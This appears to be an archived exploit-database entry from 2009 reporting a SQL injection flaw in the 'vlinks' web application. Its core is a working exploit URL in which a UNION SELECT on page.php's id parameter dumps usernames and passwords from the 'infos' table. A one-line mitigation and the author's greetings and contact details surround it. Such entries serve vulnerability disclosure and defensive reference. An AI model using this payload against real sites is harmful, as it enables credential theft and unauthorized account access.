vlinks

vendor:

vlinks

by:

JIKO(JAWAD)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: vlinks

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The vulnerable file is page.php?nc=vbvb&id=-1 union select 0,concat(nom,0x3a,passe),2,3+from+infos--

Mitigation:

Input validation and sanitization

Source

Exploit-DB raw data:

#########################################################################################
[!x!] Informations:

Name           : vlinks
Download       : http://www.vlinks.org/ =>http://www.vlinks.org/vlinks-v1.1.6.rar
Vulnerability  : Sql Injection
Author         : JIKO(JAWAD)
Contact        : jalikom@hotmail.com
Site           : No-ExploiT.CoM/Forum (langague arabic)
Notes          : 3arabi Muslim Maghribi (bladi blad lmgharba kamlin Dini Din lmsalmin Kamlin)
#########################################################################################
[!x!] Bug:

Bugged file is /[path]/page.php?

[Note]
Pass Simple
[/Note]

#########################################################################################
[!x!] Exploit:

Exploit: http://no-exploit.com/forum/page.php?nc=vbvb&id=-1 union select 0,concat(nom,0x3a,passe),2,3+from+infos--

########################################################################################
[!x!] To: ÙÙ„Ø³Ø·ÙŠÙ† Ø§Ù„ØØ±Ø©
Cyber-Zone(Abdelkhalek) ,Hussin X ,leopard ,FrFoRHaCKeR ,ShBh BaGhDaD ,RoMyOoOo
members [No-exploit.Com]

# milw0rm.com [2009-02-13]